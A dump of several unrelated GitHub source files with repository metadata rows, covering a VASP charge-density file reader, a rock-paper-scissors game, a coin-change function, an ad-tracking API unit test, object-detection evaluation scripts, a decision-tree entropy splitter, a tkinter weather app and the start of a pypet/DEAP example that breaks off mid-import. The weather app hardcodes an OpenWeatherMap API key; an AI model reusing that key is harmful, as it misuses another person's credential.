        directory so np.fromfile can stream the grid values; the scratch file
        is not deleted afterwards.
        """
        f = open(self.chgfile, 'r')
        contents = f.readlines()
        f.close()
        # Get the lattice parameter and lattice vectors
        self.lattice = float(contents[1])
        for i in range(3):
            for j in range(3):
                self.latticevec[i, j] = float(contents[i+2].split()[j])
        # Line 6 holds the per-species atom counts.
        self.typelist = np.array(contents[5].split(), int)
        ntypes = len(self.typelist)
        for a in self.typelist:
            self.natoms += a
        # Just read in the coordinates, DO NOT save them!
        coordinates = np.zeros((self.natoms, 3))
        for i in range(self.natoms):
            for j in range(3):
                coordinates[i,j] = float(contents[i+7].split()[j])
        # Grid dimensions follow the coordinate block.
        for i in range(3):
            self.gridpoints[i] = int(contents[8+self.natoms].split()[i])
        ngrid = 1
        for i in range(3):
            ngrid *= int(self.gridpoints[i])
        # Augmentation charges start at (gridpoints/5 + self.natoms + 9)
        # Since we don't need those (they're only related to PAW psp's), we will not even bother with them
        ngx = int(self.gridpoints[0])
        ngy = int(self.gridpoints[1])
        ngz = int(self.gridpoints[2])
        self.chgden = np.zeros((ngx, ngy, ngz))
        # Dump the raw grid text to a scratch file, then let numpy stream it
        # back one x-row at a time (x varies fastest in CHGCAR ordering).
        tmp = open('tmp', 'w')
        for con in contents[(self.natoms+9): -1]:
            tmp.write(con)
        tmp.write(contents[-1])
        tmp.close()
        f2 = open('tmp', 'r')
        for zz in range(ngz):
            for yy in range(ngy):
                self.chgden[:, yy, zz] = np.fromfile(f2, dtype=float, count=ngx, sep=' ')
        f2.close()
        contents = None # Clear out the variable contents
    def write_chgfile(self, name):
        """Write lattice, atoms and charge-density grid to *name* in CHGCAR
        format (header, counts, 'Direct' coordinates, grid, 5 values/row)."""
        f = open(name, 'w')
        f.write('unknown system\n')
        f.write('%10.5f\n' % self.lattice)
        for i in range(3):
            for j in range(3):
                f.write('%13.6f' % self.latticevec[i,j])
            f.write('\n')
        # Collapse the per-atom species list into (species, count) runs.
        unique_atoms = list()
        for list_, count in itertools.groupby(self.atomlist):
            number = 0
            for c in count:
                number += 1
            unique_atoms.append([list_, number])
        natoms = 0
        for atom in unique_atoms:
            f.write('%5i' % (atom[1]))
            natoms += atom[1]
        f.write('\nDirect\n')
        for i in range(natoms):
            for j in range(3):
                f.write('%12.6f' % self.coordinates[i,j])
            f.write('\n')
        f.write('\n')
        for i in range(3):
            f.write('%5i' % self.gridpoints[i])
        f.write('\n')
        ngrid = int(self.gridpoints[0]*self.gridpoints[1]*self.gridpoints[2])
        ngx = int(self.gridpoints[0])
        ngy = int(self.gridpoints[1])
        ngz = int(self.gridpoints[2])
        # Emit grid values x-fastest, wrapping the line every 5 values.
        count = 0
        for zz in range(ngz):
            for yy in range(ngy):
                for xx in range(ngx):
                    count += 1
                    f.write('%22.11e' % self.chgden[xx, yy, zz])
                    if (count % 5 == 0):
                        f.write('\n')
        f.close()
        # print 'CHGCAR file', name, 'successfully written.\n'
| [
"glen@glen-VirtualBox.(none)"
] | glen@glen-VirtualBox.(none) |
4db18047d418f05886f0867b18a5287ce69aef4e | 7c5a2dcd8dbde425f0d224c29ddf2589df5f6e95 | /rock paper scisosooros.py | ef86509736e048d9189e330f5de68d7715af0d52 | [] | no_license | s0Iitaire/idk-fam | 6a63af6043ea58e672941d209b4f4bdae4edbfc4 | 683ea99d3bb2adbb450e0729f0048a50da31e30d | refs/heads/main | 2023-03-29T04:07:07.481486 | 2021-03-28T22:43:41 | 2021-03-28T22:43:41 | 352,451,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | # imports random function
# imports random function
import random

# Game loop: keep playing rounds until the player declines a rematch.
game = True
while game:
    usersSelect = int(input("choose one of these options:\n 1 = Rock \n 2 = Paper \n 3 = Scissors\n"))
    computerSelect = random.randint(1, 3)
    # Announce the computer's move.
    if computerSelect == 1:
        print("computer chose Rock")
    elif computerSelect == 2:
        print("computer chose Paper")
    else:
        print("computer chose scissors")
    # Decide the round: rock(1) beats scissors(3), paper(2) beats rock(1),
    # scissors(3) beats paper(2).
    if usersSelect == computerSelect:
        print("it'z a draw!")
    elif (usersSelect, computerSelect) in ((1, 3), (2, 1), (3, 2)):
        print("you win!")
    else:
        print("computer wins!")
    # BUG FIX: the original set game=False when the answer WAS "Y", i.e. it
    # quit exactly when the player asked to play again.  Now any answer
    # other than y/Y ends the game.
    text = input("play again?")
    if text.strip().lower() != "y":
        game = False
| [
"noreply@github.com"
] | s0Iitaire.noreply@github.com |
d1d8b0f0745d0cbadc0870e6c03600d69579d87f | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/coins_20200607123443.py | 742c4c7e6e1d456cb4ac4cfeb1fabd621a8f9488 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py |
def change(amount, coins):
    """Count the distinct combinations of *coins* that sum to *amount*.

    Completes the half-written draft (it ended at ``if mount``, a syntax
    error) as classic coin-change counting, where coin order does not
    matter: ways[a] is the number of ways to make amount ``a`` using the
    coins processed so far.
    """
    ways = [0] * (amount + 1)
    ways[0] = 1  # one way to make 0: take no coins
    for coin in coins:
        for a in range(coin, amount + 1):
            ways[a] += ways[a - coin]
    return ways[amount]
change(5,[1,2,5])
| [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
e3216a059768b75953a953db9bd77fd8b723a848 | d593d4f75aefa78f63c15ec94c4364d2e5f5aa1d | /advisor/is_direct_logic/static/test_offer_open_email_with_offer_click_and_browse_cbtt_08.py | 7ba398dd025836229152e928ce801cec8b672f6c | [] | no_license | rpheart/pycharmTmcautomation | 16549f18d9bb8dd88b55f7f653cafbbcd3819c78 | 9682c02b0984e09078d3a7cdf3bdaaf365ae3108 | refs/heads/master | 2020-03-25T14:01:58.600105 | 2018-03-06T12:02:33 | 2018-03-06T12:02:33 | 143,852,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,602 | py | import os
import unittest
from random import randint
import requests
import advisor.is_direct_logic.utils as utils
import advisor.utils.api_calls as api
import advisor.utils.env_config as settings
import advisor.utils.tcpdump as tcp
# Globals
# Random per-run key so this run's events can be picked out of the shared
# tcpdump stream later.
unique_key = randint(1000, 10000)
email = "TC08_%s@advisortest.com" % unique_key
cookie_id = "88888_%s" % unique_key
cbtt = None
sku = "123"
filtered_response = []
# environment variables
env = os.environ["BUILD_ENV"]  # raises KeyError if BUILD_ENV is not set
advisor = settings.api_settings[env]["advisor"]
renderer = settings.api_settings[env]["renderer"]
click = settings.api_settings[env]["clickback"]
guid = settings.client_settings[env]["guid"]
aid = settings.client_settings[env]["aid"]
username = settings.client_settings[env]["username"]
password = settings.client_settings[env]["password"]
tcp_username = settings.kafka_settings[env]["tcp_username"]
tcp_server = settings.kafka_settings[env]["tcp_server"]
tcp_key = settings.kafka_settings[env]["tcp_key"]
# Per-environment engagement/campaign id.
# NOTE(review): any other BUILD_ENV leaves 'engagement' undefined, causing a
# NameError when send_requests() runs.
if env == "QA":
    engagement = "13223"
elif env == "PREPROD":
    engagement = "6884"
def send_requests():
    """Fire the tracked events that the test class later verifies.

    First an offer open and an offer click; when a response URL carries a
    ``cbtt=`` token it is captured and attached to the subsequent browse
    event, followed by cart-add and buy events on the same cookie id.
    NOTE(review): if no response URL contains 'cbtt=', the local ``cbtt``
    below is never bound and building request_list_cbtt raises
    UnboundLocalError -- confirm the click redirect always carries it.
    """
    request_list = [
        api.offer_open(renderer, guid, engagement, email=email),
        api.offer_click(click, guid, engagement, email=email)
    ]
    for request in request_list:
        response = requests.get(request)
        # raise_for_status() returns None on success, so this branch runs
        # for every 2xx response.
        if not response.raise_for_status():
            if "cbtt=" in response.url:
                # Everything after 'cbtt=' is the tracking token.
                nonsense, cbtt = response.url.split("cbtt=")
    request_list_cbtt = [
        api.browse(advisor, username, password, aid, sku, cookie_id=cookie_id, cbtt=cbtt),
        api.cart_add(advisor, username, password, aid, sku, cookie_id=cookie_id),
        api.buy(advisor, username, password, aid, sku, cookie_id=cookie_id)
    ]
    for request in request_list_cbtt:
        requests.get(request).raise_for_status()
class TestOfferOpenEmailWithOfferClickAndBrowseCbtt(unittest.TestCase):
    """End-to-end check: every tracked event (offer open, offer click,
    browse-with-cbtt, cart add, buy) must reach the tcpdump stream with full
    campaign information, and is-direct logic must hold for the set.

    The test methods index filtered_response positionally, i.e. they assume
    events appear in the stream in the order they were sent.
    """
    @classmethod
    def setUpClass(cls):
        # Send the events once, then keep only the tcpdump lines belonging
        # to this run (identified by the random unique_key).
        send_requests()
        response = tcp.fetch_tcpdump(tcp_server, tcp_username, tcp_key)
        for line in tcp.filter_tcpdump(response):
            if str(unique_key) in line:
                filtered_response.append(line)
    def test_is_direct_is_true(self):
        self.assertTrue(utils.verify_is_direct(filtered_response),
                        msg="is direct logic should be true but is: %s" % str(
                            utils.verify_is_direct(filtered_response)))
    def test_offer_open_contains_all_event_information(self):
        self.assertTrue(utils.verify_json_contains_events(filtered_response[0]),
                        msg="offer open event is missing this campaign information")
    def test_offer_click_contains_all_event_information(self):
        self.assertTrue(utils.verify_json_contains_events(filtered_response[1]),
                        msg="offer click event is missing this campaign information")
    def test_browse_contains_all_event_information(self):
        self.assertTrue(utils.verify_json_contains_events(filtered_response[2]),
                        msg="browse event is missing this campaign information")
    def test_cart_add_contains_all_event_information(self):
        self.assertTrue(utils.verify_json_contains_events(filtered_response[3]),
                        msg="cart add event is missing this campaign information")
    def test_buy_contains_all_event_information(self):
        self.assertTrue(utils.verify_json_contains_events(filtered_response[4]),
                        msg="buy event is missing this campaign information")
if __name__ == "__main__":
unittest.main()
| [
"patrick.summers@smartfocus.com"
] | patrick.summers@smartfocus.com |
b1bd78b498674dcbdece7b2c8afec187d4fa30ef | 119dece27950b3eec7f85c8e4594acb76a08579f | /python/test_evaluate.py | a204ae29aff40f18dfd527edc5e3e9397e742668 | [] | no_license | seanorar/Memoria | 871f981ce5a231de239004cc1c677d7ec507e63e | 612bcf451ae81a1e87518ea4271da9706ec7c87e | refs/heads/master | 2021-01-20T10:53:39.939727 | 2018-01-02T13:56:11 | 2018-01-02T13:56:11 | 97,170,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,989 | py | from evaluate import *
# Model definition / weight pairs: *_i = ImageNet-trained, *_p = Pascal-VOC.
#prototxt_i = "/home/sormeno/py-faster-rcnn/models/imagenet/VGG16/faster_rcnn_end2end/test.prototxt"
#caffemodel_i = "/home/sormeno/py-faster-rcnn/data/faster_rcnn_models/VGG16_faster_rcnn_imagenet.caffemodel"
prototxt_i = "/home/sormeno/Desktop/ZF_ILSVRC.prototxt"
caffemodel_i = "/home/sormeno/Desktop/ZF_ILSVRC_170W_600_31_0.v2.caffemodel"
prototxt_p = "/home/sormeno/py-faster-rcnn/models/pascal_voc/VGG16/faster_rcnn_end2end/test.prototxt"
caffemodel_p = "/home/sormeno/py-faster-rcnn/data/faster_rcnn_models/VGG16_faster_rcnn_final.caffemodel"
# The triple-quoted blocks below are disabled experiment runs kept for
# reference (ImageNet val, Pascal val, and a custom video dataset).
#imagenet
#-------------------------------------------------------------------------
"""
txt_data = "/home/sormeno/Datasets/Imagenet/ILSVRC13/data/det_lists/val.txt"
path_imgs = "/home/sormeno/Datasets/Imagenet/ILSVRC13/ILSVRC2013_DET_val/"
path_xmls = "/home/sormeno/Datasets/Imagenet/ILSVRC13/ILSVRC2013_DET_bbox_val/"
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_p, caffemodel_p, "gpu", "/home/sormeno/imagenet_pascal")
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_i, caffemodel_i, "gpu", "/home/sormeno/imagenet_imagenet")
"""
#pascal
#---------------------------------------------------------------------------
"""
txt_data = "/home/sormeno/Datasets/Pascal/val.txt"
path_imgs = "/home/sormeno/Datasets/Pascal/Images/"
path_xmls = "/home/sormeno/Datasets/Pascal/xmls/"
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_p, caffemodel_p, "gpu", "/home/sormeno/pascal_pascal")
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_i, caffemodel_i, "gpu", "/home/sormeno/pascal_imagenet")
"""
#dataset
#---------------------------------------------------------------------------
"""
txt_data = "/home/sormeno/Desktop/videos/1/val.txt"
path_imgs = "/home/sormeno/Desktop/videos/1/shots/"
path_xmls = "/home/sormeno/Desktop/videos/1/bbox_data.txt"
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_p, caffemodel_p, "gpu", "/home/sormeno/mdata_pascal_1")
data_to_graphs(txt_data, path_imgs, path_xmls, prototxt_i, caffemodel_i, "gpu", "/home/sormeno/mdata_imagenet_1")
"""
# The only live calls: plot threshold curves and precision/recall for the
# 'mdata' results over 6 runs (functions come from `evaluate`).
plot_data_vs_trsh("mdata",6)
plot_presicion_vs_recall("mdata",6)
"""
prototxt = "/home/sebastian/Escritorio/data_app/test_pascal.prototxt"
caffemodel = "/home/sebastian/Escritorio/data_app/VGG16_faster_rcnn_final.caffemodel"
path_img = "/home/sebastian/Escritorio/universidad/memoria/py-faster-rcnn/tools/videos/1/to_proces/12.jpg"
path_xml = "/home/sebastian/Escritorio/ILSVRC2012_val_00000001.xml"
path_txt = "/home/sebastian/Escritorio/universidad/memoria/py-faster-rcnn/tools/videos/1/bbox_detected.txt"
gt = get_bbox_from_txt(path_txt, "12")
net = init_net(prototxt, caffemodel, "cpu")
predicted = get_img_bbox2(path_img, net)
img = cv2.imread(path_img)
show_best_roi(img,gt, predicted)
"""
#bbox_val_imagenet("/home/sormeno/Datasets/Imagenet/ILSVRC2014_devkit/data/det_lists/", "/home/sormeno/Datasets/Imagenet/ILSVRC2013_DET_bbox_val/", "/home/sormeno/Datasets/Imagenet/ILSVRC2013_DET_val/")
"seba_orme@hotmail.com"
] | seba_orme@hotmail.com |
0e856ffc51a9a1c7e642398621d9fc3c81414ff0 | d0d46725767ac4399ca3df883a32038a21fdca90 | /decision_tree/split_by_entropy.py | 4bad3f919f896ac71f9fe069c886a7350922931a | [] | no_license | andvoidlei/algorithm-python | 23e3d87342c3ea8f00c961a30af0dbc43a11418f | ee645a4a3b82231c0c33b2c29c82ac980363463c | refs/heads/master | 2021-06-26T19:56:17.316891 | 2020-10-20T12:53:15 | 2020-10-20T12:53:15 | 138,046,280 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 4 13:35:15 2018
@author: Administrator
"""
from cal_entropy import *
def Split_Data(dataset, axis, value):
'''
使用传入的axis以及value划分数据集
axis代表在每个列表中的第X位,value为用来划分的特征值
输出非axis特征值及结果
'''
new_subset = []
# 利用循环将不符合value的特征值划分入另一集合
# 相当于将value单独提取出来(或作为叶节点)
for vec in dataset:
if vec[axis] == value:
feature_split = vec[:axis]
print(vec[:axis])
feature_split.extend(vec[axis + 1:])
new_subset.append(feature_split)
# extend将VEC中的元素一一纳入feature_split
# append则将feature_split作为列表结合进目标集合
return new_subset
def Split_by_entropy(dataset):
'''
使用熵原则进行数据集划分
@信息增益:info_gain = old -new
@最优特征:best_feature
@类别集合:uniVal
'''
feature_num = len(dataset[0]) - 1
ent_old = cal_entropy(dataset)
best_gain = 0.0
best_feature = -1
# ENT_OLD代表划分前集合的熵,ENT_NEW代表划分后的熵
# best_gain将在迭代每一次特征的时候更新,最终选出最优特征
for i in range(feature_num):
feature_list = [x[i] for x in dataset]
uniVal = set(feature_list)
ent_new = 0.0
# 使用set剔除重复项,保留该特征对应的不同取值
for value in uniVal:
sub_set = Split_Data(dataset, i, value)
prob = len(sub_set) / float(len(dataset))
# 使用熵计算函数求出划分后的熵值
ent_new += prob * (0 - cal_entropy(sub_set))
# 由ent_old - ent_new选出划分对应的最优特征
Info_gain = ent_old - ent_new
if (Info_gain > best_gain):
best_gain = Info_gain
best_feature = i
return best_feature | [
"andvoid_lei@163.com"
] | andvoid_lei@163.com |
7a07505f57ca38099f4fd05c34e0ed4651f5cad6 | f521bf0937dddcc022b1bad179831a03b7e59318 | /tests/test_pipper.py | 8dce678876259b4d8c262cd351bfa0fff64c2d5b | [
"BSD-3-Clause"
] | permissive | jdvala/pipgrip | 243664e3dde58c7897901c0b8c1d4cb3cfde75db | 84a766dca193e8df45a2d45ac3fa4cda219fbcac | refs/heads/master | 2022-11-30T18:59:17.054091 | 2020-08-07T08:58:34 | 2020-08-07T08:58:34 | 295,218,451 | 1 | 0 | BSD-3-Clause | 2020-09-13T19:04:27 | 2020-09-13T19:04:26 | null | UTF-8 | Python | false | false | 6,747 | py | import os
import subprocess
import pytest
import pipgrip.pipper
from pipgrip.pipper import _download_wheel, _get_available_versions
@pytest.mark.parametrize(
"package, pip_output, expected",
[
(
".[all]",
"""
Collecting jupyterlab-black
Downloading https://files.pythonhosted.org/packages/b3/c9/b3d38a0cc2a5237becb3c2f8843ca5a8e884906e9018029e4c4e5c43f62e/jupyterlab_black-0.2.1.tar.gz
Building wheels for collected packages: jupyterlab-black
Running setup.py bdist_wheel for jupyterlab-black: started
Running setup.py bdist_wheel for jupyterlab-black: finished with status 'done'
Stored in directory: ~/Library/Caches/pip/wheels/pipgrip
Successfully built jupyterlab-black
""",
"a.whl",
),
(
"six",
"""
Collecting six
Downloading https://files.pythonhosted.org/packages/ee/ff/48bde5c0f013094d729fe4b0316ba2a24774b3ff1c52d924a8a4cb04078a/six-1.15.0-py2.py3-none-any.whl
Saved ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"jupyterlab-black",
"""
Collecting jupyterlab-black
Downloading https://files.pythonhosted.org/packages/b3/c9/b3d38a0cc2a5237becb3c2f8843ca5a8e884906e9018029e4c4e5c43f62e/jupyterlab_black-0.2.1.tar.gz
Building wheels for collected packages: jupyterlab-black
Running setup.py bdist_wheel for jupyterlab-black: started
Running setup.py bdist_wheel for jupyterlab-black: finished with status 'done'
Stored in directory: ~/Library/Caches/pip/wheels/pipgrip
Successfully built jupyterlab-black
""",
"jupyterlab_black-0.2.1-py3-none-any.whl",
),
(
"six",
"""
Collecting six
File was already downloaded ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"six",
"""
Collecting six
Using cached six-1.15.0-py2.py3-none-any.whl (10 kB)
Saved ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"six",
"""
Collecting six
Downloading six-1.15.0-py2.py3-none-any.whl (10 kB)
Saved ~/Library/Caches/pip/wheels/pipgrip/six-1.15.0-py2.py3-none-any.whl
Skipping six, due to already being wheel.
""",
"six-1.15.0-py2.py3-none-any.whl",
),
(
"jupyterlab-black",
"""
Collecting jupyterlab-black
Downloading jupyterlab_black-0.2.1.tar.gz (3.1 kB)
Building wheels for collected packages: jupyterlab-black
Building wheel for jupyterlab-black (setup.py): started
Building wheel for jupyterlab-black (setup.py): finished with status 'done'
Created wheel for jupyterlab-black: filename=jupyterlab_black-0.2.1-py3-none-any.whl size=2497 sha256=2d21a5420b39156f7e55da105b8a064889674ae8a1a09f3fd2884c78a994a851
Stored in directory: ~/Library/Caches/pip/wheels/83/ba/78/469d847858dff4d2e600bff2de9d09bf455bb5be3ffb566af1
Successfully built jupyterlab-black
""",
"jupyterlab_black-0.2.1-py3-none-any.whl",
),
(
"Keras",
"""
Collecting Keras
Using cached https://files.pythonhosted.org/packages/6b/09/756db7ae3dd2ec804963e21db8250ffe347aaba6f6d13d6c0ed833d85109/Keras-2.4.3-py2.py3-none-any.whl
Saved ~/library/caches/pip/wheels/pipgrip/Keras-2.4.3-py2.py3-none-any.whl
""",
"Keras-2.4.3-py2.py3-none-any.whl",
),
],
ids=(
"pip10 .",
"pip10 fetched 1",
"pip10 built 1",
"pip>10 cached 1",
"pip>10 cached 2",
"pip>10 fetched 2",
"pip>10 built 1",
"Windows lowercase cache_dir",
),
)
def test_download_wheel(package, pip_output, expected, monkeypatch):
    """_download_wheel must pick the right wheel out of the cache dir,
    whatever wording the installed pip version prints (the parametrized
    cases cover pip 10 and newer, built and cached wheels)."""
    cache_dir = "~/Library/Caches/pip/wheels/pipgrip"

    def patch_os_walk(*args, **kwargs):
        # Pretend the cache dir contains exactly these three wheels.
        yield cache_dir, None, [
            "a.whl",
            "jupyterlab_black-0.2.1-py3-none-any.whl",
            "x.whl",
        ]

    def patch_getmtime(*args, **kwargs):
        # Constant mtime keeps any newest-wheel ordering deterministic.
        return 0

    def patch_pip_output(*args, **kwargs):
        # Replace the real pip subprocess call with the canned output.
        return pip_output

    monkeypatch.setattr(
        pipgrip.pipper.os, "walk", patch_os_walk,
    )
    monkeypatch.setattr(
        pipgrip.pipper.os.path, "getmtime", patch_getmtime,
    )
    monkeypatch.setattr(
        pipgrip.pipper, "stream_bash_command", patch_pip_output,
    )
    assert _download_wheel(
        package, "https://pypi.org/simple", "https://pypi.org/simple", False, cache_dir,
    ) == os.path.join(cache_dir, expected.lstrip(os.path.sep))
@pytest.mark.parametrize(
"package, pre, pip_output, expected",
[
(
"click",
True,
"""
Collecting click==rubbish
Could not find a version that satisfies the requirement click==rubbish (from versions: 6.6, 6.7.dev0, 6.7, 7.0, 7.1, 7.1.1, 7.1.2)
No matching distribution found for click==rubbish
""",
["6.6", "6.7.dev0", "6.7", "7.0", "7.1", "7.1.1", "7.1.2"],
),
(
"click",
False,
"""
Collecting click==rubbish
Could not find a version that satisfies the requirement click==rubbish (from versions: 6.6, 6.7.dev0, 6.7, 7.0, 7.1, 7.1.1, 7.1.2)
No matching distribution found for click==rubbish
""",
["6.6", "6.7", "7.0", "7.1", "7.1.1", "7.1.2"],
),
],
ids=("click pre", "click"),
)
def test_get_available_versions(package, pre, pip_output, expected, monkeypatch):
    """Version discovery parses the 'from versions: ...' list out of pip's
    error text; pre-release versions are kept only when pre=True."""
    def patch_pip_output(*args, **kwargs):
        # _get_available_versions works by letting pip fail on a bogus pin,
        # so the stub raises like a failed subprocess with the canned output.
        raise subprocess.CalledProcessError(returncode=1, cmd="", output=pip_output)

    monkeypatch.setattr(
        pipgrip.pipper, "stream_bash_command", patch_pip_output,
    )
    assert (
        _get_available_versions(package, "https://pypi.org/simple", None, pre)
        == expected
    )
| [
"noreply@github.com"
] | jdvala.noreply@github.com |
3b3322f1e95944bd832f02cd426aaf751b7b9e2d | 09175fc0e91d9acf794dde9b7ac9818fb484f610 | /images/folder_util.py | f1b744dabc3d343ca7e06829c5257f1a20ad5677 | [] | no_license | dyeden/mapbiomas-utils | 612ae1bce148da000376bcda6150cf70a0d6cdc6 | 89bad2a81a96075e6f8850dbf253a6cfef163196 | refs/heads/master | 2020-05-02T15:51:04.052593 | 2019-05-05T22:07:37 | 2019-05-05T22:07:37 | 178,053,811 | 1 | 0 | null | 2019-05-05T22:07:38 | 2019-03-27T18:36:06 | Python | UTF-8 | Python | false | false | 393 | py | """
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/INTEGRACAO
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/RGB
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/TRANSICAO
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/VRT/INTEGRACAO
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/VRT/RGB
mkdir -p /mnt/disks/data/data2/collections/COLECAO3_1/VRT/TRANSICAO
""" | [
"dyeden.monteiro@terras.agr.br"
] | dyeden.monteiro@terras.agr.br |
9f221f4aed7b605b04d8d8aa9a732b2c4c612faf | 4e83f4c3fdba728d6d888d9077f47f5a87a8858e | /weather.py | 896ea14d1a398b5ff6fdb1484021af46ac63698e | [
"Apache-2.0"
] | permissive | Gagan-nmims/Weather_Forecast | c66cee57cce0b7e4e9a05959ca574ed5e735e8ba | 1cafeebeec0f6398f8e9da05bc5f679175b158f9 | refs/heads/main | 2023-06-09T04:33:04.494536 | 2021-06-26T08:25:12 | 2021-06-26T08:25:12 | 380,451,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,641 | py | # import all functions from the tkinter
from tkinter import *
# function to find weather details
# of any city using openweathermap api
def tell_weather() :
    """Look up the current weather for the city typed into ``city_field``
    via the OpenWeatherMap API and fill the result entry boxes.

    Fixes two bugs in the original:
    * the API returns Kelvin by default but the raw value was labelled
      "Farenheit" -- it is now converted to Celsius and labelled as such;
    * ``messagebox`` is not exported by ``from tkinter import *``, so the
      city-not-found branch raised NameError -- it is now imported here.
    """
    # import required modules
    import requests, json
    from tkinter import messagebox

    # enter your api key here
    api_key = "bec52956c57b0d87d77cfc1390bb2458"

    # base_url variable to store url
    base_url = "http://api.openweathermap.org/data/2.5/weather?"

    # take a city name from city_field entry box
    city_name = city_field.get()

    # complete_url variable to store complete url address
    complete_url = (base_url + "appid=" + api_key + "&q=" + city_name)

    # get method of requests module returns a response object
    response = requests.get(complete_url)

    # json method converts the payload into Python dicts/lists
    x = response.json()

    # the value of the "cod" key is "404" when the city is unknown
    if x["cod"] != "404" :
        # "main" holds temperature/pressure/humidity
        y = x["main"]
        # OpenWeatherMap's default units are Kelvin; convert to Celsius.
        current_temperature = round(y["temp"] - 273.15, 2)
        current_pressure = y["pressure"]
        current_humidiy = y["humidity"]
        # "weather" is a list; its first entry carries the description
        z = x["weather"]
        weather_description = z[0]["description"]

        # insert the values into the text entry boxes
        temp_field.insert(1, str(current_temperature) + " Celsius")
        atm_field.insert(10, str(current_pressure) + " hPa")
        humid_field.insert(15, str(current_humidiy) + " %")
        desc_field.insert(10, str(weather_description) )

    # if city is not found
    else :
        # show an error dialog with the failure reason
        messagebox.showerror("Error", "City Not Found \n" "Please enter valid city name")

        # clear the content of city_field entry box
        city_field.delete(0, END)
# Function for clearing the
# contents of all text entry boxes
def clear_all() :
    """Wipe every entry box, then put the cursor back into the city field."""
    for entry_box in (city_field, temp_field, atm_field, humid_field, desc_field):
        entry_box.delete(0, END)
    # return keyboard focus to the city name box
    city_field.focus_set()
if __name__ == "__main__" :
# Create a GUI window
root = Tk()
# set the name of tkinter GUI window
root.title("Weather Application")
# Set the background colour of GUI window
root.configure(background = "aqua")
# Set the configuration of GUI window
root.geometry("425x175")
# Create a Weather Gui Application label
headlabel = Label(root, text = "Weather Application", fg = 'black',bg='white')
# Create a City name : label
label1 = Label(root, text = "City name : ", fg = 'black',bg='aqua')
# Create a City name : label
label2 = Label(root, text = "Temperature :", fg = 'black',bg='aqua')
# Create a atm pressure : label
label3 = Label(root, text = "Atm pressure :", fg = 'black',bg='aqua')
# Create a humidity : label
label4 = Label(root, text = "Humidity :", fg = 'black',bg='aqua')
# Create a description :label
label5 = Label(root, text = "Description :", fg = 'black',bg='aqua')
# grid method is used for placing
# the widgets at respective positions
# in table like structure .
headlabel.grid(row = 0, column = 1)
label1.grid(row = 1, column = 0, sticky ="E")
label2.grid(row = 3, column = 0, sticky ="E")
label3.grid(row = 4, column = 0, sticky ="E")
label4.grid(row = 5, column = 0, sticky ="E")
label5.grid(row = 6, column = 0, sticky ="E")
# Create a text entry box
# for filling or typing the information.
city_field = Entry(root)
temp_field = Entry(root)
atm_field = Entry(root)
humid_field = Entry(root)
desc_field = Entry(root)
# grid method is used for placing
# the widgets at respective positions
# in table like structure .
# ipadx keyword argument set width of entry space .
city_field.grid(row = 1, column = 1, ipadx ="60")
temp_field.grid(row = 3, column = 1, ipadx ="100")
atm_field.grid(row = 4, column = 1, ipadx ="100")
humid_field.grid(row = 5, column = 1, ipadx ="100")
desc_field.grid(row = 6, column = 1, ipadx ="100")
# Create a Submit Button and attached
# to tell_weather function
button1 = Button(root, text = "Submit", fg = "black", command = tell_weather)
# Create a Clear Button and attached
# to clear_all function
button2 = Button(root, text = "Clear", fg = "black", command = clear_all)
# grid method is used for placing
# the widgets at respective positions
# in table like structure .
button1.grid(row = 2, column = 1)
button2.grid(row = 7, column = 1)
# Start the GUI
root.mainloop() | [
"76172276+Gagan-nmims@users.noreply.github.com"
] | 76172276+Gagan-nmims@users.noreply.github.com |
c53ec5397ec182007a22d88243b2d4ec32a3f966 | d6ca0b326f1bd0ce381c6db611f6331096bf4187 | /examples/example_20_using_deap_manual_runs.py | ab46bba8dfec0020018669d017e35953cbda71ea | [
"BSD-3-Clause"
] | permissive | SmokinCaterpillar/pypet | aa35355d70e8f44be015313494376d993f645d80 | 3d454ac65f89e7833baaf89510f73c546e90d8f6 | refs/heads/develop | 2023-08-08T16:01:54.087819 | 2023-02-14T14:59:32 | 2023-02-14T14:59:32 | 12,901,526 | 89 | 22 | BSD-3-Clause | 2023-07-24T00:46:12 | 2013-09-17T17:06:00 | Python | UTF-8 | Python | false | false | 6,723 | py | """ An example showing how to use DEAP optimization (http://pythonhosted.org/deap/).
DEAP can be combined with *pypet* to keep track of all the data and the full trajectory
of points created by a genetic algorithm.
Note that *pypet* adds quite some overhead to the optimization algorithm.
Using *pypet* in combination with DEAP is only suitable in case the
evaluation of an individual (i.e. a single run) takes a considerable amount of time
(i.e. 1 second or longer) and, thus, pypet's overhead is only marginal.
This *OneMax* problem serves only as an example and is not a well suited problem.
Suitable would be the genetic optimization of neural networks where running and evaluating
the network may take a few seconds.
Here we avoid using an Environment and *manually* execute runs using multiprocessing.
"""
__author__ = 'Robert Meyer'
import random
import os
import multiprocessing as multip
try:
from itertools import izip
